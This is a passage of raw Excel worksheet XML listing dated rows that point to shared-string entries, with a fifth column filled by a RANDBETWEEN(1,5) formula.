      <c r="F19954">
        <f t="shared" ca="1" si="311"/>
        <v>2</v>
      </c>
    </row>
    <row r="19955" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19955" s="1">
        <v>43129.388912037037</v>
      </c>
      <c r="C19955" t="s">
        <v>10</v>
      </c>
      <c r="D19955" t="s">
        <v>89</v>
      </c>
      <c r="E19955" t="s">
        <v>17920</v>
      </c>
      <c r="F19955">
        <f t="shared" ca="1" si="311"/>
        <v>5</v>
      </c>
    </row>
    <row r="19956" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19956" s="1">
        <v>43129.384826388887</v>
      </c>
      <c r="C19956" t="s">
        <v>10</v>
      </c>
      <c r="D19956" t="s">
        <v>271</v>
      </c>
      <c r="E19956" t="s">
        <v>17921</v>
      </c>
      <c r="F19956">
        <f t="shared" ca="1" si="311"/>
        <v>5</v>
      </c>
    </row>
    <row r="19957" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19957" s="1">
        <v>43129.375509259262</v>
      </c>
      <c r="C19957" t="s">
        <v>41</v>
      </c>
      <c r="E19957" t="s">
        <v>17922</v>
      </c>
      <c r="F19957">
        <f t="shared" ca="1" si="311"/>
        <v>5</v>
      </c>
    </row>
    <row r="19958" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19958" s="1">
        <v>43129.373391203706</v>
      </c>
      <c r="C19958" t="s">
        <v>4508</v>
      </c>
      <c r="D19958" t="s">
        <v>41</v>
      </c>
      <c r="E19958" s="2" t="s">
        <v>17923</v>
      </c>
      <c r="F19958">
        <f t="shared" ca="1" si="311"/>
        <v>3</v>
      </c>
    </row>
    <row r="19959" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A19959" s="1">
        <v>43129.372870370367</v>
      </c>
      <c r="C19959" t="s">
        <v>731</v>
      </c>
      <c r="E19959" s="2" t="s">
        <v>17924</v>
      </c>
      <c r="F19959">
        <f t="shared" ca="1" si="311"/>
        <v>1</v>
      </c>
    </row>
    <row r="19960" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19960" s="1">
        <v>43129.363391203704</v>
      </c>
      <c r="C19960" t="s">
        <v>10</v>
      </c>
      <c r="D19960" t="s">
        <v>178</v>
      </c>
      <c r="E19960" t="s">
        <v>17925</v>
      </c>
      <c r="F19960">
        <f t="shared" ca="1" si="311"/>
        <v>3</v>
      </c>
    </row>
    <row r="19961" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19961" s="1">
        <v>43129.359039351853</v>
      </c>
      <c r="C19961" t="s">
        <v>60</v>
      </c>
      <c r="E19961" t="s">
        <v>17926</v>
      </c>
      <c r="F19961">
        <f t="shared" ca="1" si="311"/>
        <v>1</v>
      </c>
    </row>
    <row r="19962" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19962" s="1">
        <v>43129.358993055554</v>
      </c>
      <c r="C19962" t="s">
        <v>65</v>
      </c>
      <c r="D19962" t="s">
        <v>312</v>
      </c>
      <c r="E19962" s="2" t="s">
        <v>17927</v>
      </c>
      <c r="F19962">
        <f t="shared" ca="1" si="311"/>
        <v>4</v>
      </c>
    </row>
    <row r="19963" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19963" s="1">
        <v>43129.352800925924</v>
      </c>
      <c r="C19963" t="s">
        <v>6</v>
      </c>
      <c r="D19963" t="s">
        <v>25</v>
      </c>
      <c r="E19963" t="s">
        <v>17928</v>
      </c>
      <c r="F19963">
        <f t="shared" ca="1" si="311"/>
        <v>4</v>
      </c>
    </row>
    <row r="19964" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19964" s="1">
        <v>43129.329756944448</v>
      </c>
      <c r="C19964" t="s">
        <v>14</v>
      </c>
      <c r="E19964" s="2" t="s">
        <v>17929</v>
      </c>
      <c r="F19964">
        <f t="shared" ca="1" si="311"/>
        <v>2</v>
      </c>
    </row>
    <row r="19965" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19965" s="1">
        <v>43129.266689814816</v>
      </c>
      <c r="C19965" t="s">
        <v>41</v>
      </c>
      <c r="E19965" t="s">
        <v>17930</v>
      </c>
      <c r="F19965">
        <f t="shared" ca="1" si="311"/>
        <v>3</v>
      </c>
    </row>
    <row r="19966" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19966" s="1">
        <v>43129.263865740744</v>
      </c>
      <c r="C19966" t="s">
        <v>71</v>
      </c>
      <c r="E19966" s="2" t="s">
        <v>17931</v>
      </c>
      <c r="F19966">
        <f t="shared" ca="1" si="311"/>
        <v>5</v>
      </c>
    </row>
    <row r="19967" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19967" s="1">
        <v>43129.246458333335</v>
      </c>
      <c r="C19967" t="s">
        <v>103</v>
      </c>
      <c r="E19967" s="2" t="s">
        <v>17932</v>
      </c>
      <c r="F19967">
        <f t="shared" ca="1" si="311"/>
        <v>2</v>
      </c>
    </row>
    <row r="19968" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A19968" s="1">
        <v>43129.242002314815</v>
      </c>
      <c r="C19968" t="s">
        <v>41</v>
      </c>
      <c r="E19968" s="2" t="s">
        <v>17933</v>
      </c>
      <c r="F19968">
        <f t="shared" ca="1" si="311"/>
        <v>2</v>
      </c>
    </row>
    <row r="19969" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19969" s="1">
        <v>43129.239212962966</v>
      </c>
      <c r="C19969" t="s">
        <v>97</v>
      </c>
      <c r="E19969" t="s">
        <v>17934</v>
      </c>
      <c r="F19969">
        <f t="shared" ca="1" si="311"/>
        <v>3</v>
      </c>
    </row>
    <row r="19970" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19970" s="1">
        <v>43129.234884259262</v>
      </c>
      <c r="C19970" t="s">
        <v>63</v>
      </c>
      <c r="E19970" s="2" t="s">
        <v>17935</v>
      </c>
      <c r="F19970">
        <f t="shared" ref="F19970:F20033" ca="1" si="312">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="19971" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A19971" s="1">
        <v>43129.210972222223</v>
      </c>
      <c r="C19971" t="s">
        <v>10</v>
      </c>
      <c r="D19971" t="s">
        <v>6</v>
      </c>
      <c r="E19971" s="2" t="s">
        <v>17936</v>
      </c>
      <c r="F19971">
        <f t="shared" ca="1" si="312"/>
        <v>3</v>
      </c>
    </row>
    <row r="19972" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19972" s="1">
        <v>43129.208761574075</v>
      </c>
      <c r="C19972" t="s">
        <v>48</v>
      </c>
      <c r="E19972" t="s">
        <v>17937</v>
      </c>
      <c r="F19972">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="19973" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19973" s="1">
        <v>43129.173032407409</v>
      </c>
      <c r="C19973" t="s">
        <v>253</v>
      </c>
      <c r="E19973" t="s">
        <v>17938</v>
      </c>
      <c r="F19973">
        <f t="shared" ca="1" si="312"/>
        <v>3</v>
      </c>
    </row>
    <row r="19974" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19974" s="1">
        <v>43129.170636574076</v>
      </c>
      <c r="C19974" t="s">
        <v>229</v>
      </c>
      <c r="E19974" t="s">
        <v>17939</v>
      </c>
      <c r="F19974">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="19975" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19975" s="1">
        <v>43129.167951388888</v>
      </c>
      <c r="C19975" t="s">
        <v>48</v>
      </c>
      <c r="E19975" s="2" t="s">
        <v>17940</v>
      </c>
      <c r="F19975">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="19976" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A19976" s="1">
        <v>43129.162731481483</v>
      </c>
      <c r="C19976" t="s">
        <v>71</v>
      </c>
      <c r="E19976" s="2" t="s">
        <v>17941</v>
      </c>
      <c r="F19976">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="19977" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19977" s="1">
        <v>43129.15421296296</v>
      </c>
      <c r="C19977" t="s">
        <v>41</v>
      </c>
      <c r="E19977" s="2" t="s">
        <v>17942</v>
      </c>
      <c r="F19977">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="19978" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A19978" s="1">
        <v>43129.116006944445</v>
      </c>
      <c r="C19978" t="s">
        <v>5022</v>
      </c>
      <c r="D19978" t="s">
        <v>229</v>
      </c>
      <c r="E19978" s="2" t="s">
        <v>15027</v>
      </c>
      <c r="F19978">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="19979" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19979" s="1">
        <v>43129.107499999998</v>
      </c>
      <c r="C19979" t="s">
        <v>173</v>
      </c>
      <c r="E19979" s="2" t="s">
        <v>17943</v>
      </c>
      <c r="F19979">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="19980" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A19980" s="1">
        <v>43129.07707175926</v>
      </c>
      <c r="C19980" t="s">
        <v>41</v>
      </c>
      <c r="E19980" s="2" t="s">
        <v>17944</v>
      </c>
      <c r="F19980">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="19981" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19981" s="1">
        <v>43129.072939814818</v>
      </c>
      <c r="C19981" t="s">
        <v>253</v>
      </c>
      <c r="E19981" t="s">
        <v>17945</v>
      </c>
      <c r="F19981">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="19982" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19982" s="1">
        <v>43129.000914351855</v>
      </c>
      <c r="C19982" t="s">
        <v>140</v>
      </c>
      <c r="D19982" t="s">
        <v>141</v>
      </c>
      <c r="E19982" s="2" t="s">
        <v>17946</v>
      </c>
      <c r="F19982">
        <f t="shared" ca="1" si="312"/>
        <v>4</v>
      </c>
    </row>
    <row r="19983" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19983" s="1">
        <v>43128.594930555555</v>
      </c>
      <c r="C19983" t="s">
        <v>229</v>
      </c>
      <c r="D19983" t="s">
        <v>251</v>
      </c>
      <c r="E19983" t="s">
        <v>17947</v>
      </c>
      <c r="F19983">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="19984" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19984" s="1">
        <v>43128.578229166669</v>
      </c>
      <c r="C19984" t="s">
        <v>463</v>
      </c>
      <c r="D19984" t="s">
        <v>56</v>
      </c>
      <c r="E19984" t="s">
        <v>17948</v>
      </c>
      <c r="F19984">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="19985" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19985" s="1">
        <v>43128.243344907409</v>
      </c>
      <c r="C19985" t="s">
        <v>197</v>
      </c>
      <c r="E19985" t="s">
        <v>17949</v>
      </c>
      <c r="F19985">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="19986" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19986" s="1">
        <v>43128.200937499998</v>
      </c>
      <c r="C19986" t="s">
        <v>7058</v>
      </c>
      <c r="D19986" t="s">
        <v>6</v>
      </c>
      <c r="E19986" s="2" t="s">
        <v>17950</v>
      </c>
      <c r="F19986">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="19987" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A19987" s="1">
        <v>43128.167916666665</v>
      </c>
      <c r="C19987" t="s">
        <v>63</v>
      </c>
      <c r="D19987" t="s">
        <v>25</v>
      </c>
      <c r="E19987" s="2" t="s">
        <v>17951</v>
      </c>
      <c r="F19987">
        <f t="shared" ca="1" si="312"/>
        <v>4</v>
      </c>
    </row>
    <row r="19988" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19988" s="1">
        <v>43128.017187500001</v>
      </c>
      <c r="C19988" t="s">
        <v>10</v>
      </c>
      <c r="D19988" t="s">
        <v>80</v>
      </c>
      <c r="E19988" s="2" t="s">
        <v>17952</v>
      </c>
      <c r="F19988">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="19989" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19989" s="1">
        <v>43127.865682870368</v>
      </c>
      <c r="C19989" t="s">
        <v>6</v>
      </c>
      <c r="D19989" t="s">
        <v>194</v>
      </c>
      <c r="E19989" t="s">
        <v>17953</v>
      </c>
      <c r="F19989">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="19990" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19990" s="1">
        <v>43127.800821759258</v>
      </c>
      <c r="C19990" t="s">
        <v>97</v>
      </c>
      <c r="E19990" t="s">
        <v>17954</v>
      </c>
      <c r="F19990">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="19991" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19991" s="1">
        <v>43127.703530092593</v>
      </c>
      <c r="C19991" t="s">
        <v>10</v>
      </c>
      <c r="D19991" t="s">
        <v>6</v>
      </c>
      <c r="E19991" t="s">
        <v>17955</v>
      </c>
      <c r="F19991">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="19992" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A19992" s="1">
        <v>43127.666342592594</v>
      </c>
      <c r="C19992" t="s">
        <v>151</v>
      </c>
      <c r="D19992" t="s">
        <v>367</v>
      </c>
      <c r="E19992" s="2" t="s">
        <v>15027</v>
      </c>
      <c r="F19992">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="19993" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19993" s="1">
        <v>43127.664027777777</v>
      </c>
      <c r="C19993" t="s">
        <v>10</v>
      </c>
      <c r="D19993" t="s">
        <v>36</v>
      </c>
      <c r="E19993" s="2" t="s">
        <v>17956</v>
      </c>
      <c r="F19993">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="19994" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19994" s="1">
        <v>43127.61451388889</v>
      </c>
      <c r="C19994" t="s">
        <v>6</v>
      </c>
      <c r="D19994" t="s">
        <v>114</v>
      </c>
      <c r="E19994" t="s">
        <v>17957</v>
      </c>
      <c r="F19994">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="19995" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19995" s="1">
        <v>43127.560891203706</v>
      </c>
      <c r="C19995" t="s">
        <v>7058</v>
      </c>
      <c r="D19995" t="s">
        <v>124</v>
      </c>
      <c r="E19995" s="2" t="s">
        <v>17958</v>
      </c>
      <c r="F19995">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="19996" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19996" s="1">
        <v>43127.344606481478</v>
      </c>
      <c r="C19996" t="s">
        <v>10</v>
      </c>
      <c r="D19996" t="s">
        <v>89</v>
      </c>
      <c r="E19996" s="2" t="s">
        <v>17959</v>
      </c>
      <c r="F19996">
        <f t="shared" ca="1" si="312"/>
        <v>3</v>
      </c>
    </row>
    <row r="19997" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A19997" s="1">
        <v>43127.168865740743</v>
      </c>
      <c r="C19997" t="s">
        <v>41</v>
      </c>
      <c r="E19997" s="2" t="s">
        <v>17960</v>
      </c>
      <c r="F19997">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="19998" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19998" s="1">
        <v>43126.988819444443</v>
      </c>
      <c r="C19998" t="s">
        <v>41</v>
      </c>
      <c r="E19998" t="s">
        <v>17961</v>
      </c>
      <c r="F19998">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="19999" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19999" s="1">
        <v>43126.937754629631</v>
      </c>
      <c r="C19999" t="s">
        <v>50</v>
      </c>
      <c r="D19999" t="s">
        <v>1036</v>
      </c>
      <c r="E19999" s="2" t="s">
        <v>17962</v>
      </c>
      <c r="F19999">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="20000" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20000" s="1">
        <v>43126.925011574072</v>
      </c>
      <c r="C20000" t="s">
        <v>1080</v>
      </c>
      <c r="D20000" t="s">
        <v>92</v>
      </c>
      <c r="E20000" t="s">
        <v>17963</v>
      </c>
      <c r="F20000">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="20001" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20001" s="1">
        <v>43126.795231481483</v>
      </c>
      <c r="C20001" t="s">
        <v>10</v>
      </c>
      <c r="D20001" t="s">
        <v>6</v>
      </c>
      <c r="E20001" t="s">
        <v>17964</v>
      </c>
      <c r="F20001">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="20002" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20002" s="1">
        <v>43126.754062499997</v>
      </c>
      <c r="C20002" t="s">
        <v>10</v>
      </c>
      <c r="D20002" t="s">
        <v>80</v>
      </c>
      <c r="E20002" t="s">
        <v>17965</v>
      </c>
      <c r="F20002">
        <f t="shared" ca="1" si="312"/>
        <v>3</v>
      </c>
    </row>
    <row r="20003" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20003" s="1">
        <v>43126.74417824074</v>
      </c>
      <c r="C20003" t="s">
        <v>10</v>
      </c>
      <c r="D20003" t="s">
        <v>46</v>
      </c>
      <c r="E20003" t="s">
        <v>17966</v>
      </c>
      <c r="F20003">
        <f t="shared" ca="1" si="312"/>
        <v>3</v>
      </c>
    </row>
    <row r="20004" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20004" s="1">
        <v>43126.733495370368</v>
      </c>
      <c r="C20004" t="s">
        <v>1408</v>
      </c>
      <c r="E20004" t="s">
        <v>17967</v>
      </c>
      <c r="F20004">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="20005" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A20005" s="1">
        <v>43126.724016203705</v>
      </c>
      <c r="C20005" t="s">
        <v>7058</v>
      </c>
      <c r="D20005" t="s">
        <v>67</v>
      </c>
      <c r="E20005" s="2" t="s">
        <v>17968</v>
      </c>
      <c r="F20005">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="20006" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20006" s="1">
        <v>43126.660740740743</v>
      </c>
      <c r="C20006" t="s">
        <v>10</v>
      </c>
      <c r="D20006" t="s">
        <v>23</v>
      </c>
      <c r="E20006" s="2" t="s">
        <v>17969</v>
      </c>
      <c r="F20006">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="20007" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20007" s="1">
        <v>43126.646655092591</v>
      </c>
      <c r="C20007" t="s">
        <v>10</v>
      </c>
      <c r="D20007" t="s">
        <v>107</v>
      </c>
      <c r="E20007" t="s">
        <v>17970</v>
      </c>
      <c r="F20007">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="20008" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20008" s="1">
        <v>43126.61341435185</v>
      </c>
      <c r="C20008" t="s">
        <v>82</v>
      </c>
      <c r="D20008" t="s">
        <v>312</v>
      </c>
      <c r="E20008" s="2" t="s">
        <v>17971</v>
      </c>
      <c r="F20008">
        <f t="shared" ca="1" si="312"/>
        <v>4</v>
      </c>
    </row>
    <row r="20009" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20009" s="1">
        <v>43126.611388888887</v>
      </c>
      <c r="C20009" t="s">
        <v>222</v>
      </c>
      <c r="D20009" t="s">
        <v>330</v>
      </c>
      <c r="E20009" s="2" t="s">
        <v>17972</v>
      </c>
      <c r="F20009">
        <f t="shared" ca="1" si="312"/>
        <v>3</v>
      </c>
    </row>
    <row r="20010" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20010" s="1">
        <v>43126.608749999999</v>
      </c>
      <c r="C20010" t="s">
        <v>10</v>
      </c>
      <c r="D20010" t="s">
        <v>667</v>
      </c>
      <c r="E20010" t="s">
        <v>17973</v>
      </c>
      <c r="F20010">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="20011" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20011" s="1">
        <v>43126.597291666665</v>
      </c>
      <c r="C20011" t="s">
        <v>10</v>
      </c>
      <c r="D20011" t="s">
        <v>251</v>
      </c>
      <c r="E20011" t="s">
        <v>17974</v>
      </c>
      <c r="F20011">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="20012" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20012" s="1">
        <v>43126.560925925929</v>
      </c>
      <c r="C20012" t="s">
        <v>6</v>
      </c>
      <c r="D20012" t="s">
        <v>25</v>
      </c>
      <c r="E20012" t="s">
        <v>17975</v>
      </c>
      <c r="F20012">
        <f t="shared" ca="1" si="312"/>
        <v>4</v>
      </c>
    </row>
    <row r="20013" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20013" s="1">
        <v>43126.558020833334</v>
      </c>
      <c r="C20013" t="s">
        <v>10</v>
      </c>
      <c r="D20013" t="s">
        <v>52</v>
      </c>
      <c r="E20013" t="s">
        <v>17976</v>
      </c>
      <c r="F20013">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="20014" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20014" s="1">
        <v>43126.52857638889</v>
      </c>
      <c r="C20014" t="s">
        <v>10</v>
      </c>
      <c r="D20014" t="s">
        <v>86</v>
      </c>
      <c r="E20014" s="2" t="s">
        <v>17977</v>
      </c>
      <c r="F20014">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="20015" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A20015" s="1">
        <v>43126.522638888891</v>
      </c>
      <c r="C20015" t="s">
        <v>4429</v>
      </c>
      <c r="D20015" t="s">
        <v>92</v>
      </c>
      <c r="E20015" s="2" t="s">
        <v>17978</v>
      </c>
      <c r="F20015">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="20016" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20016" s="1">
        <v>43126.51829861111</v>
      </c>
      <c r="C20016" t="s">
        <v>124</v>
      </c>
      <c r="D20016" t="s">
        <v>494</v>
      </c>
      <c r="E20016" s="2" t="s">
        <v>17979</v>
      </c>
      <c r="F20016">
        <f t="shared" ca="1" si="312"/>
        <v>3</v>
      </c>
    </row>
    <row r="20017" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20017" s="1">
        <v>43126.502604166664</v>
      </c>
      <c r="C20017" t="s">
        <v>10</v>
      </c>
      <c r="D20017" t="s">
        <v>89</v>
      </c>
      <c r="E20017" s="2" t="s">
        <v>17980</v>
      </c>
      <c r="F20017">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="20018" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20018" s="1">
        <v>43126.480324074073</v>
      </c>
      <c r="C20018" t="s">
        <v>10</v>
      </c>
      <c r="D20018" t="s">
        <v>92</v>
      </c>
      <c r="E20018" t="s">
        <v>17981</v>
      </c>
      <c r="F20018">
        <f t="shared" ca="1" si="312"/>
        <v>3</v>
      </c>
    </row>
    <row r="20019" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20019" s="1">
        <v>43126.471354166664</v>
      </c>
      <c r="C20019" t="s">
        <v>260</v>
      </c>
      <c r="E20019" s="2" t="s">
        <v>17982</v>
      </c>
      <c r="F20019">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="20020" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20020" s="1">
        <v>43126.470937500002</v>
      </c>
      <c r="C20020" t="s">
        <v>10</v>
      </c>
      <c r="D20020" t="s">
        <v>1036</v>
      </c>
      <c r="E20020" t="s">
        <v>17983</v>
      </c>
      <c r="F20020">
        <f t="shared" ca="1" si="312"/>
        <v>3</v>
      </c>
    </row>
    <row r="20021" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A20021" s="1">
        <v>43126.456192129626</v>
      </c>
      <c r="C20021" t="s">
        <v>10</v>
      </c>
      <c r="D20021" t="s">
        <v>163</v>
      </c>
      <c r="E20021" s="2" t="s">
        <v>17984</v>
      </c>
      <c r="F20021">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="20022" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20022" s="1">
        <v>43126.447500000002</v>
      </c>
      <c r="C20022" t="s">
        <v>10</v>
      </c>
      <c r="D20022" t="s">
        <v>39</v>
      </c>
      <c r="E20022" t="s">
        <v>17985</v>
      </c>
      <c r="F20022">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="20023" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20023" s="1">
        <v>43126.444571759261</v>
      </c>
      <c r="C20023" t="s">
        <v>10</v>
      </c>
      <c r="D20023" t="s">
        <v>89</v>
      </c>
      <c r="E20023" t="s">
        <v>17986</v>
      </c>
      <c r="F20023">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="20024" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20024" s="1">
        <v>43126.441979166666</v>
      </c>
      <c r="C20024" t="s">
        <v>10</v>
      </c>
      <c r="D20024" t="s">
        <v>80</v>
      </c>
      <c r="E20024" t="s">
        <v>17987</v>
      </c>
      <c r="F20024">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="20025" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A20025" s="1">
        <v>43126.420277777775</v>
      </c>
      <c r="C20025" t="s">
        <v>6</v>
      </c>
      <c r="D20025" t="s">
        <v>194</v>
      </c>
      <c r="E20025" s="2" t="s">
        <v>17988</v>
      </c>
      <c r="F20025">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
    <row r="20026" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A20026" s="1">
        <v>43126.4137962963</v>
      </c>
      <c r="C20026" t="s">
        <v>10</v>
      </c>
      <c r="D20026" t="s">
        <v>6</v>
      </c>
      <c r="E20026" s="2" t="s">
        <v>17989</v>
      </c>
      <c r="F20026">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="20027" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20027" s="1">
        <v>43126.406145833331</v>
      </c>
      <c r="C20027" t="s">
        <v>41</v>
      </c>
      <c r="E20027" t="s">
        <v>17990</v>
      </c>
      <c r="F20027">
        <f t="shared" ca="1" si="312"/>
        <v>4</v>
      </c>
    </row>
    <row r="20028" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A20028" s="1">
        <v>43126.392187500001</v>
      </c>
      <c r="C20028" t="s">
        <v>10</v>
      </c>
      <c r="D20028" t="s">
        <v>263</v>
      </c>
      <c r="E20028" s="2" t="s">
        <v>17991</v>
      </c>
      <c r="F20028">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="20029" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20029" s="1">
        <v>43126.38140046296</v>
      </c>
      <c r="C20029" t="s">
        <v>10</v>
      </c>
      <c r="D20029" t="s">
        <v>494</v>
      </c>
      <c r="E20029" t="s">
        <v>17992</v>
      </c>
      <c r="F20029">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="20030" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20030" s="1">
        <v>43126.284189814818</v>
      </c>
      <c r="C20030" t="s">
        <v>559</v>
      </c>
      <c r="D20030" t="s">
        <v>312</v>
      </c>
      <c r="E20030" t="s">
        <v>17993</v>
      </c>
      <c r="F20030">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="20031" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20031" s="1">
        <v>43126.258761574078</v>
      </c>
      <c r="C20031" t="s">
        <v>71</v>
      </c>
      <c r="E20031" t="s">
        <v>17994</v>
      </c>
      <c r="F20031">
        <f t="shared" ca="1" si="312"/>
        <v>5</v>
      </c>
    </row>
